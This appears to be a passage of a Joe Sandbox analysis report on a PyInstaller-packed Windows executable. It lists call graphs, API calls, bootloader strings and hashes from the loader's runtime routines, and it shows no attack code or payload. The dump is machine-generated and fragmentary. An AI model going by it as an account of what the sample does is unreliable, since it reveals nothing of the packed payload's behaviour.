7ff78da64f78 memcpy_s 11 API calls 18807->18808 18812 7ff78da65ce6 18808->18812 18810 7ff78da65cf0 18809->18810 18811 7ff78da64f78 memcpy_s 11 API calls 18810->18811 18810->18816 18813 7ff78da65cfa 18811->18813 18814 7ff78da65d34 GetDriveTypeW 18812->18814 18812->18816 18815 7ff78da67e78 45 API calls 18813->18815 18814->18816 18815->18812 18816->18799 18819 7ff78da65a5c 18817->18819 18818 7ff78da6578d 18827 7ff78da65b70 18818->18827 18819->18818 18841 7ff78da6f794 18819->18841 18821 7ff78da65af0 18821->18818 18822 7ff78da6f794 51 API calls 18821->18822 18823 7ff78da65b03 18822->18823 18823->18818 18824 7ff78da6f794 51 API calls 18823->18824 18825 7ff78da65b16 18824->18825 18825->18818 18826 7ff78da6f794 51 API calls 18825->18826 18826->18818 18828 7ff78da65b8a 18827->18828 18829 7ff78da65bc1 18828->18829 18830 7ff78da65b9a 18828->18830 18831 7ff78da6f628 21 API calls 18829->18831 18832 7ff78da64eec _fread_nolock 11 API calls 18830->18832 18833 7ff78da65baa 18830->18833 18831->18833 18832->18833 18833->18769 18835 7ff78da659bd FileTimeToSystemTime 18834->18835 18836 7ff78da659b0 18834->18836 18837 7ff78da659d1 SystemTimeToTzSpecificLocalTime 18835->18837 18838 7ff78da659b8 18835->18838 18836->18835 18836->18838 18837->18838 18839 7ff78da5c5c0 _log10_special 8 API calls 18838->18839 18840 7ff78da658a9 18839->18840 18840->18790 18842 7ff78da6f7c5 18841->18842 18843 7ff78da6f7a1 18841->18843 18845 7ff78da6f7ff 18842->18845 18848 7ff78da6f81e 18842->18848 18843->18842 18844 7ff78da6f7a6 18843->18844 18846 7ff78da64f78 memcpy_s 11 API calls 18844->18846 18847 7ff78da64f78 memcpy_s 11 API calls 18845->18847 18849 7ff78da6f7ab 18846->18849 18850 7ff78da6f804 18847->18850 18851 7ff78da64fbc 45 API calls 18848->18851 18852 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 18849->18852 18854 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 18850->18854 18856 7ff78da6f82b 18851->18856 18853 7ff78da6f7b6 18852->18853 18853->18821 18855 7ff78da6f80f 18854->18855 18855->18821 18856->18855 18857 7ff78da7054c 51 API calls 18856->18857 18857->18856 20635 7ff78da71720 20646 7ff78da77454 20635->20646 20647 7ff78da77461 20646->20647 20648 7ff78da6a9b8 __free_lconv_num 11 API calls 20647->20648 20650 7ff78da7747d 20647->20650 20648->20647 20649 7ff78da6a9b8 __free_lconv_num 11 API calls 20649->20650 20650->20649 20651 7ff78da71729 20650->20651 20652 7ff78da70348 EnterCriticalSection 20651->20652 19582 7ff78da77c90 19585 7ff78da72660 19582->19585 19586 7ff78da7266d 19585->19586 19587 7ff78da726b2 19585->19587 19591 7ff78da6b294 19586->19591 19592 7ff78da6b2a5 FlsGetValue 19591->19592 19593 7ff78da6b2c0 FlsSetValue 19591->19593 19594 7ff78da6b2ba 19592->19594 19595 7ff78da6b2b2 19592->19595 19593->19595 19596 7ff78da6b2cd 19593->19596 19594->19593 19597 7ff78da6a574 _CreateFrameInfo 45 API calls 19595->19597 19599 7ff78da6b2b8 19595->19599 19598 7ff78da6ec08 memcpy_s 11 API calls 19596->19598 19600 7ff78da6b335 19597->19600 19601 7ff78da6b2dc 19598->19601 19611 7ff78da72334 19599->19611 19602 7ff78da6b2fa FlsSetValue 19601->19602 19603 7ff78da6b2ea FlsSetValue 19601->19603 19604 7ff78da6b318 19602->19604 19605 7ff78da6b306 FlsSetValue 19602->19605 19606 7ff78da6b2f3 19603->19606 19607 7ff78da6af64 memcpy_s 11 API calls 19604->19607 19605->19606 19608 7ff78da6a9b8 __free_lconv_num 11 API calls 19606->19608 19609 7ff78da6b320 19607->19609 19608->19595 19610 7ff78da6a9b8 __free_lconv_num 11 API calls 19609->19610 19610->19599 19634 7ff78da725a4 19611->19634 19613 7ff78da72369 19649 7ff78da72034 19613->19649 19616 7ff78da6d66c _fread_nolock 12 API calls 19617 7ff78da72397 19616->19617 19618 7ff78da7239f 19617->19618 19620 7ff78da723ae 19617->19620 19619 7ff78da6a9b8 __free_lconv_num 11 API calls 19618->19619 19632 7ff78da72386 19619->19632 19620->19620 19656 7ff78da726dc 19620->19656 19623 7ff78da724aa 19624 7ff78da64f78 memcpy_s 11 API calls 19623->19624 19625 7ff78da724af 19624->19625 19627 7ff78da6a9b8 __free_lconv_num 11 API calls 19625->19627 19626 7ff78da72505 19633 7ff78da7256c 19626->19633 19667 7ff78da71e64 19626->19667 19627->19632 19628 7ff78da724c4 19628->19626 19630 7ff78da6a9b8 __free_lconv_num 11 API calls 19628->19630 19629 7ff78da6a9b8 __free_lconv_num 11 API calls 19629->19632 19630->19626 19632->19587 19633->19629 19635 7ff78da725c7 19634->19635 19636 7ff78da725d1 19635->19636 19682 7ff78da70348 EnterCriticalSection 19635->19682 19639 7ff78da72643 19636->19639 19641 7ff78da6a574 _CreateFrameInfo 45 API calls 19636->19641 19639->19613 19642 7ff78da7265b 19641->19642 19645 7ff78da726b2 19642->19645 19646 7ff78da6b294 50 API calls 19642->19646 19645->19613 19647 7ff78da7269c 19646->19647 19648 7ff78da72334 65 API calls 19647->19648 19648->19645 19650 7ff78da64fbc 45 API calls 19649->19650 19651 7ff78da72048 19650->19651 19652 7ff78da72066 19651->19652 19653 7ff78da72054 GetOEMCP 19651->19653 19654 7ff78da7207b 19652->19654 19655 7ff78da7206b GetACP 19652->19655 19653->19654 19654->19616 19654->19632 19655->19654 19657 7ff78da72034 47 API calls 19656->19657 19658 7ff78da72709 19657->19658 19659 7ff78da7285f 19658->19659 19660 7ff78da72746 IsValidCodePage 19658->19660 19666 7ff78da72760 memcpy_s 19658->19666 19661 7ff78da5c5c0 _log10_special 8 API calls 19659->19661 19660->19659 19662 7ff78da72757 19660->19662 19663 7ff78da724a1 19661->19663 19664 7ff78da72786 GetCPInfo 19662->19664 19662->19666 19663->19623 19663->19628 19664->19659 19664->19666 19683 7ff78da7214c 19666->19683 19739 7ff78da70348 EnterCriticalSection 19667->19739 19684 7ff78da72189 GetCPInfo 19683->19684 19685 7ff78da7227f 19683->19685 19684->19685 19690 7ff78da7219c 19684->19690 19686 7ff78da5c5c0 _log10_special 8 API calls 19685->19686 19688 7ff78da7231e 19686->19688 19687 7ff78da72eb0 48 API calls 19689 7ff78da72213 19687->19689 19688->19659 19694 7ff78da77bf4 19689->19694 19690->19687 19693 7ff78da77bf4 54 API calls 19693->19685 19695 7ff78da64fbc 45 API calls 19694->19695 19696 7ff78da77c19 19695->19696 19699 7ff78da778c0 19696->19699 19700 7ff78da77901 19699->19700 19701 7ff78da6f910 _fread_nolock MultiByteToWideChar 19700->19701 19705 7ff78da7794b 19701->19705 19702 7ff78da77bc9 19703 7ff78da5c5c0 _log10_special 8 API calls 19702->19703 19704 7ff78da72246 19703->19704 19704->19693 19705->19702 19706 7ff78da6d66c _fread_nolock 12 API calls 19705->19706 19707 7ff78da77983 19705->19707 19718 7ff78da77a81 19705->19718 19706->19707 19709 7ff78da6f910 _fread_nolock MultiByteToWideChar 19707->19709 19707->19718 19708 7ff78da6a9b8 __free_lconv_num 11 API calls 19708->19702 19710 7ff78da779f6 19709->19710 19710->19718 19730 7ff78da6f154 19710->19730 19713 7ff78da77a41 19715 7ff78da6f154 __crtLCMapStringW 6 API calls 19713->19715 19713->19718 19714 7ff78da77a92 19716 7ff78da6d66c _fread_nolock 12 API calls 19714->19716 19717 7ff78da77b64 19714->19717 19720 7ff78da77ab0 19714->19720 19715->19718 19716->19720 19717->19718 19719 7ff78da6a9b8 __free_lconv_num 11 API calls 19717->19719 19718->19702 19718->19708 19719->19718 19720->19718 19721 7ff78da6f154 __crtLCMapStringW 6 API calls 19720->19721 19722 7ff78da77b30 19721->19722 19722->19717 19723 7ff78da77b66 19722->19723 19724 7ff78da77b50 19722->19724 19726 7ff78da70858 WideCharToMultiByte 19723->19726 19725 7ff78da70858 WideCharToMultiByte 19724->19725 19727 7ff78da77b5e 19725->19727 19726->19727 19727->19717 19728 7ff78da77b7e 19727->19728 19728->19718 19729 7ff78da6a9b8 __free_lconv_num 11 API calls 19728->19729 19729->19718 19731 7ff78da6ed80 __crtLCMapStringW 5 API calls 19730->19731 19732 7ff78da6f192 19731->19732 19733 7ff78da6f19a 19732->19733 19736 7ff78da6f240 19732->19736 19733->19713 19733->19714 19733->19718 19735 7ff78da6f203 LCMapStringW 19735->19733 19737 7ff78da6ed80 __crtLCMapStringW 5 API calls 19736->19737 19738 7ff78da6f26e __crtLCMapStringW 19737->19738 19738->19735 20677 7ff78da6c590 20688 7ff78da70348 EnterCriticalSection 20677->20688 19929 7ff78da6f9fc 19930 7ff78da6fbee 19929->19930 19932 7ff78da6fa3e _isindst 19929->19932 19931 7ff78da64f78 memcpy_s 11 API calls 19930->19931 19949 7ff78da6fbde 19931->19949 19932->19930 19935 7ff78da6fabe _isindst 19932->19935 19933 7ff78da5c5c0 _log10_special 8 API calls 19934 7ff78da6fc09 19933->19934 19950 7ff78da76204 19935->19950 19940 7ff78da6fc1a 19942 7ff78da6a970 _isindst 17 API calls 19940->19942 19943 7ff78da6fc2e 19942->19943 19947 7ff78da6fb1b 19947->19949 19974 7ff78da76248 19947->19974 19949->19933 19951 7ff78da76213 19950->19951 19952 7ff78da6fadc 19950->19952 19981 7ff78da70348 EnterCriticalSection 19951->19981 19956 7ff78da75608 19952->19956 19957 7ff78da6faf1 19956->19957 19958 7ff78da75611 19956->19958 19957->19940 19962 7ff78da75638 19957->19962 19959 7ff78da64f78 memcpy_s 11 API calls 19958->19959 19960 7ff78da75616 19959->19960 19961 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 19960->19961 19961->19957 19963 7ff78da75641 19962->19963 19965 7ff78da6fb02 19962->19965 19964 7ff78da64f78 memcpy_s 11 API calls 19963->19964 19966 7ff78da75646 19964->19966 19965->19940 19968 7ff78da75668 19965->19968 19967 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 19966->19967 19967->19965 19969 7ff78da6fb13 19968->19969 19970 7ff78da75671 19968->19970 19969->19940 19969->19947 19971 7ff78da64f78 memcpy_s 11 API calls 19970->19971 19972 7ff78da75676 19971->19972 19973 7ff78da6a950 _invalid_parameter_noinfo 37 API calls 19972->19973 19973->19969 19982 7ff78da70348 EnterCriticalSection 19974->19982 19749 7ff78da65480 19750 7ff78da6548b 19749->19750 19758 7ff78da6f314 19750->19758 19771 7ff78da70348 EnterCriticalSection 19758->19771 19772 7ff78da7ae6e 19773 7ff78da7ae7d 19772->19773 19774 7ff78da7ae87 19772->19774 19776 7ff78da703a8 LeaveCriticalSection 19773->19776 19989 7ff78da7add9 19992 7ff78da654e8 LeaveCriticalSection 19989->19992

                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                        Function 00007FF78DA58BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 0 7ff78da58bd0-7ff78da58d16 call 7ff78da5c8c0 call 7ff78da59400 SetConsoleCtrlHandler GetStartupInfoW call 7ff78da65460 call 7ff78da6a4ec call 7ff78da6878c call 7ff78da65460 call 7ff78da6a4ec call 7ff78da6878c call 7ff78da65460 call 7ff78da6a4ec call 7ff78da6878c GetCommandLineW CreateProcessW 23 7ff78da58d3d-7ff78da58d79 RegisterClassW 0->23 24 7ff78da58d18-7ff78da58d38 GetLastError call 7ff78da52c50 0->24 26 7ff78da58d7b GetLastError 23->26 27 7ff78da58d81-7ff78da58dd5 CreateWindowExW 23->27 32 7ff78da59029-7ff78da5904f call 7ff78da5c5c0 24->32 26->27 29 7ff78da58dd7-7ff78da58ddd GetLastError 27->29 30 7ff78da58ddf-7ff78da58de4 ShowWindow 27->30 31 7ff78da58dea-7ff78da58dfa WaitForSingleObject 29->31 30->31 33 7ff78da58dfc 31->33 34 7ff78da58e78-7ff78da58e7f 31->34 36 7ff78da58e00-7ff78da58e03 33->36 37 7ff78da58ec2-7ff78da58ec9 34->37 38 7ff78da58e81-7ff78da58e91 WaitForSingleObject 34->38 40 7ff78da58e0b-7ff78da58e12 36->40 41 7ff78da58e05 GetLastError 36->41 44 7ff78da58fb0-7ff78da58fc9 GetMessageW 37->44 45 7ff78da58ecf-7ff78da58ee5 QueryPerformanceFrequency QueryPerformanceCounter 37->45 42 7ff78da58fe8-7ff78da58ff2 38->42 43 7ff78da58e97-7ff78da58ea7 TerminateProcess 38->43 40->38 47 7ff78da58e14-7ff78da58e31 PeekMessageW 40->47 41->40 50 7ff78da58ff4-7ff78da58ffa DestroyWindow 42->50 51 7ff78da59001-7ff78da59025 GetExitCodeProcess CloseHandle * 2 42->51 52 7ff78da58ea9 GetLastError 43->52 53 7ff78da58eaf-7ff78da58ebd WaitForSingleObject 43->53 48 7ff78da58fcb-7ff78da58fd9 TranslateMessage DispatchMessageW 44->48 49 7ff78da58fdf-7ff78da58fe6 44->49 46 7ff78da58ef0-7ff78da58f28 MsgWaitForMultipleObjects PeekMessageW 45->46 54 7ff78da58f2a 46->54 55 7ff78da58f63-7ff78da58f6a 46->55 56 7ff78da58e33-7ff78da58e64 TranslateMessage DispatchMessageW PeekMessageW 47->56 57 7ff78da58e66-7ff78da58e76 WaitForSingleObject 47->57 48->49 49->42 49->44 50->51 51->32 52->53 53->42 58 7ff78da58f30-7ff78da58f61 TranslateMessage DispatchMessageW PeekMessageW 54->58 55->44 59 7ff78da58f6c-7ff78da58f95 QueryPerformanceCounter 55->59 56->56 56->57 57->34 57->36 58->55 58->58 59->46 60 7ff78da58f9b-7ff78da58fa2 59->60 60->42 61 7ff78da58fa4-7ff78da58fa8 60->61 61->44
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                        • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                        • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                        • Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                        • Instruction ID: 00645d656dbfcdce2d0d80d7951af6a87ec6c29d7a5351547e2ac7ae12678e16
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CD18372A0CA8286EB10AF74E854AB9B774FF84758FB00235DA5D43A94EF3CD949C711
                                                                                                                                                                                                                                        Function 00007FF78DA51000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509COMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 62 7ff78da51000-7ff78da53806 call 7ff78da5fe88 call 7ff78da5fe90 call 7ff78da5c8c0 call 7ff78da65460 call 7ff78da654f4 call 7ff78da536b0 76 7ff78da53808-7ff78da5380f 62->76 77 7ff78da53814-7ff78da53836 call 7ff78da51950 62->77 78 7ff78da53c97-7ff78da53cb2 call 7ff78da5c5c0 76->78 82 7ff78da5391b-7ff78da53931 call 7ff78da545b0 77->82 83 7ff78da5383c-7ff78da53856 call 7ff78da51c80 77->83 90 7ff78da5396a-7ff78da5397f call 7ff78da52710 82->90 91 7ff78da53933-7ff78da53960 call 7ff78da57f80 82->91 87 7ff78da5385b-7ff78da5389b call 7ff78da58a20 83->87 97 7ff78da5389d-7ff78da538a3 87->97 98 7ff78da538c1-7ff78da538cc call 7ff78da64fa0 87->98 102 7ff78da53c8f 90->102 100 7ff78da53984-7ff78da539a6 call 7ff78da51c80 91->100 101 7ff78da53962-7ff78da53965 call 7ff78da600bc 91->101 103 7ff78da538a5-7ff78da538ad 97->103 104 7ff78da538af-7ff78da538bd call 7ff78da58b90 97->104 109 7ff78da539fc-7ff78da53a2a call 7ff78da58b30 call 7ff78da58b90 * 3 98->109 110 7ff78da538d2-7ff78da538e1 call 7ff78da58a20 98->110 115 7ff78da539b0-7ff78da539b9 100->115 101->90 102->78 103->104 104->98 138 7ff78da53a2f-7ff78da53a3e call 7ff78da58a20 109->138 119 7ff78da538e7-7ff78da538ed 110->119 120 7ff78da539f4-7ff78da539f7 call 7ff78da64fa0 110->120 115->115 118 7ff78da539bb-7ff78da539d8 call 7ff78da51950 115->118 118->87 130 7ff78da539de-7ff78da539ef call 7ff78da52710 118->130 124 7ff78da538f0-7ff78da538fc 119->124 120->109 127 7ff78da538fe-7ff78da53903 124->127 128 7ff78da53905-7ff78da53908 124->128 127->124 127->128 128->120 131 7ff78da5390e-7ff78da53916 call 7ff78da64fa0 128->131 130->102 131->138 141 7ff78da53a44-7ff78da53a47 138->141 142 7ff78da53b45-7ff78da53b53 138->142 141->142 145 7ff78da53a4d-7ff78da53a50 141->145 143 7ff78da53a67 142->143 144 7ff78da53b59-7ff78da53b5d 142->144 148 7ff78da53a6b-7ff78da53a90 call 7ff78da64fa0 143->148 144->148 146 7ff78da53b14-7ff78da53b17 145->146 147 7ff78da53a56-7ff78da53a5a 145->147 150 7ff78da53b19-7ff78da53b1d 146->150 151 7ff78da53b2f-7ff78da53b40 call 7ff78da52710 146->151 147->146 149 7ff78da53a60 147->149 157 7ff78da53aab-7ff78da53ac0 148->157 158 7ff78da53a92-7ff78da53aa6 call 7ff78da58b30 148->158 149->143 150->151 153 7ff78da53b1f-7ff78da53b2a 150->153 159 7ff78da53c7f-7ff78da53c87 151->159 153->148 161 7ff78da53be8-7ff78da53bfa call 7ff78da58a20 157->161 162 7ff78da53ac6-7ff78da53aca 157->162 158->157 159->102 170 7ff78da53bfc-7ff78da53c02 161->170 171 7ff78da53c2e 161->171 164 7ff78da53bcd-7ff78da53be2 call 7ff78da51940 162->164 165 7ff78da53ad0-7ff78da53ae8 call 7ff78da652c0 162->165 164->161 164->162 175 7ff78da53aea-7ff78da53b02 call 7ff78da652c0 165->175 176 7ff78da53b62-7ff78da53b7a call 7ff78da652c0 165->176 173 7ff78da53c1e-7ff78da53c2c 170->173 174 7ff78da53c04-7ff78da53c1c 170->174 177 7ff78da53c31-7ff78da53c40 call 7ff78da64fa0 171->177 173->177 174->177 175->164 184 7ff78da53b08-7ff78da53b0f 175->184 187 7ff78da53b7c-7ff78da53b80 176->187 188 7ff78da53b87-7ff78da53b9f call 7ff78da652c0 176->188 185 7ff78da53c46-7ff78da53c4a 177->185 186 7ff78da53d41-7ff78da53d63 call 7ff78da544d0 177->186 184->164 189 7ff78da53cd4-7ff78da53ce6 call 7ff78da58a20 185->189 190 7ff78da53c50-7ff78da53c5f call 7ff78da590e0 185->190 201 7ff78da53d65-7ff78da53d6f call 7ff78da54620 186->201 202 7ff78da53d71-7ff78da53d82 call 7ff78da51c80 186->202 187->188 197 7ff78da53bac-7ff78da53bc4 call 7ff78da652c0 188->197 198 7ff78da53ba1-7ff78da53ba5 188->198 206 7ff78da53ce8-7ff78da53ceb 189->206 207 7ff78da53d35-7ff78da53d3c 189->207 204 7ff78da53cb3-7ff78da53cb6 call 7ff78da58850 190->204 205 7ff78da53c61 190->205 197->164 217 7ff78da53bc6 197->217 198->197 215 7ff78da53d87-7ff78da53d96 201->215 202->215 216 7ff78da53cbb-7ff78da53cbd 204->216 212 7ff78da53c68 call 7ff78da52710 205->212 206->207 213 7ff78da53ced-7ff78da53d10 call 7ff78da51c80 206->213 207->212 225 7ff78da53c6d-7ff78da53c77 212->225 229 7ff78da53d2b-7ff78da53d33 call 7ff78da64fa0 213->229 230 7ff78da53d12-7ff78da53d26 call 7ff78da52710 call 7ff78da64fa0 213->230 220 7ff78da53d98-7ff78da53d9f 215->220 221 7ff78da53dc4-7ff78da53dda call 7ff78da59400 215->221 223 7ff78da53cc8-7ff78da53ccf 216->223 224 7ff78da53cbf-7ff78da53cc6 216->224 217->164 220->221 227 7ff78da53da1-7ff78da53da5 220->227 233 7ff78da53ddc 221->233 234 7ff78da53de8-7ff78da53e04 SetDllDirectoryW 221->234 223->215 224->212 225->159 227->221 231 7ff78da53da7-7ff78da53dbe SetDllDirectoryW LoadLibraryExW 227->231 229->215 230->225 231->221 233->234 237 7ff78da53e0a-7ff78da53e19 call 7ff78da58a20 234->237 238 7ff78da53f01-7ff78da53f08 234->238 251 7ff78da53e1b-7ff78da53e21 237->251 252 7ff78da53e32-7ff78da53e3c call 7ff78da64fa0 237->252 240 7ff78da53ffc-7ff78da54004 238->240 241 7ff78da53f0e-7ff78da53f15 238->241 245 7ff78da54029-7ff78da5405b call 7ff78da536a0 call 7ff78da53360 call 7ff78da53670 call 7ff78da56fb0 call 7ff78da56d60 240->245 246 7ff78da54006-7ff78da54023 PostMessageW GetMessageW 240->246 241->240 244 7ff78da53f1b-7ff78da53f25 call 7ff78da533c0 241->244 244->225 258 7ff78da53f2b-7ff78da53f3f call 7ff78da590c0 244->258 246->245 255 7ff78da53e2d-7ff78da53e2f 251->255 256 7ff78da53e23-7ff78da53e2b 251->256 263 7ff78da53ef2-7ff78da53efc call 7ff78da58b30 252->263 264 7ff78da53e42-7ff78da53e48 252->264 255->252 256->255 271 7ff78da53f64-7ff78da53fa0 call 7ff78da58b30 call 7ff78da58bd0 call 7ff78da56fb0 call 7ff78da56d60 call 7ff78da58ad0 258->271 272 7ff78da53f41-7ff78da53f5e PostMessageW GetMessageW 258->272 263->238 264->263 265 7ff78da53e4e-7ff78da53e54 264->265 269 7ff78da53e56-7ff78da53e58 265->269 270 7ff78da53e5f-7ff78da53e61 265->270 274 7ff78da53e67-7ff78da53e83 call 7ff78da56db0 call 7ff78da57330 269->274 275 7ff78da53e5a 269->275 270->238 270->274 306 7ff78da53fa5-7ff78da53fa7 271->306 272->271 289 7ff78da53e8e-7ff78da53e95 274->289 290 7ff78da53e85-7ff78da53e8c 274->290 275->238 294 7ff78da53e97-7ff78da53ea4 call 7ff78da56df0 289->294 295 7ff78da53eaf-7ff78da53eb9 call 7ff78da571a0 289->295 293 7ff78da53edb-7ff78da53ef0 call 7ff78da52a50 call 7ff78da56fb0 call 7ff78da56d60 290->293 293->238 294->295 308 7ff78da53ea6-7ff78da53ead 294->308 304 7ff78da53ebb-7ff78da53ec2 295->304 305 7ff78da53ec4-7ff78da53ed2 call 7ff78da574e0 295->305 304->293 305->238 318 7ff78da53ed4 305->318 310 7ff78da53fe9-7ff78da53ff7 call 7ff78da51900 306->310 311 7ff78da53fa9-7ff78da53fb3 call 7ff78da59200 306->311 308->293 310->225 311->310 321 7ff78da53fb5-7ff78da53fca 311->321 318->293 322 7ff78da53fcc-7ff78da53fdf call 7ff78da52710 call 7ff78da51900 321->322 323 7ff78da53fe4 call 7ff78da52a50 321->323 322->225 323->310
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2414857769.00007FF78DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78DA50000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414826898.00007FF78DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414896299.00007FF78DA7B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414931684.00007FF78DA92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2414991154.00007FF78DA94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff78da50000_9g9LZNE4bH.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileLastModuleName
                                                                                                                                                                                                                                        • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
                                                                                                                                                                                                                                        • API String ID: 2776309574-3273434969
                                                                                                                                                                                                                                        • Opcode ID: 7c6149c83ec295aa3824364e4806b56b50599473bc5d4fd4de40d1ca8c577362
                                                                                                                                                                                                                                        • Instruction ID: 1a132817db7def829fbb78c57e271a0e3ee696cf273a2a4c8b821708b2050aec
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c6149c83ec295aa3824364e4806b56b50599473bc5d4fd4de40d1ca8c577362
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C2329F25A0C68291EA15BBA19454ABDE3B1BF85740FF44431DA5D832D2FF2CED5CC322
                                                                                                                                                                                                                                        Function 00007FF78DA769D4 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 536 7ff78da769d4-7ff78da76a47 call 7ff78da76708 539 7ff78da76a49-7ff78da76a52 call 7ff78da64f58 536->539 540 7ff78da76a61-7ff78da76a6b call 7ff78da68590 536->540 545 7ff78da76a55-7ff78da76a5c call 7ff78da64f78 539->545 546 7ff78da76a6d-7ff78da76a84 call 7ff78da64f58 call 7ff78da64f78 540->546 547 7ff78da76a86-7ff78da76aef CreateFileW 540->547 562 7ff78da76da2-7ff78da76dc2 545->562 546->545 548 7ff78da76b6c-7ff78da76b77 GetFileType 547->548 549 7ff78da76af1-7ff78da76af7 547->549 555 7ff78da76b79-7ff78da76bb4 GetLastError call 7ff78da64eec CloseHandle 548->555 556 7ff78da76bca-7ff78da76bd1 548->556 552 7ff78da76b39-7ff78da76b67 GetLastError call 7ff78da64eec 549->552 553 7ff78da76af9-7ff78da76afd 549->553 552->545 553->552 560 7ff78da76aff-7ff78da76b37 CreateFileW 553->560 555->545 571 7ff78da76bba-7ff78da76bc5 call 7ff78da64f78 555->571 558 7ff78da76bd9-7ff78da76bdc 556->558 559 7ff78da76bd3-7ff78da76bd7 556->559 566 7ff78da76be2-7ff78da76c37 call 7ff78da684a8 558->566 567 7ff78da76bde 558->567 559->566 560->548 560->552 574 7ff78da76c39-7ff78da76c45 call 7ff78da76910 566->574 575 7ff78da76c56-7ff78da76c87 call 7ff78da76488 566->575 567->566 571->545 574->575 583 7ff78da76c47 574->583 581 7ff78da76c8d-7ff78da76ccf 575->581 582 7ff78da76c89-7ff78da76c8b 575->582 585 7ff78da76cf1-7ff78da76cfc 581->585 586 7ff78da76cd1-7ff78da76cd5 581->586 584 7ff78da76c49-7ff78da76c51 call 7ff78da6ab30 582->584 583->584 584->562 588 7ff78da76d02-7ff78da76d06 585->588 589 7ff78da76da0 585->589 586->585 587 7ff78da76cd7-7ff78da76cec 586->587 587->585 588->589 591 7ff78da76d0c-7ff78da76d51 CloseHandle CreateFileW 588->591 589->562 593 7ff78da76d86-7ff78da76d9b 591->593 594 7ff78da76d53-7ff78da76d81 GetLastError call 7ff78da64eec call 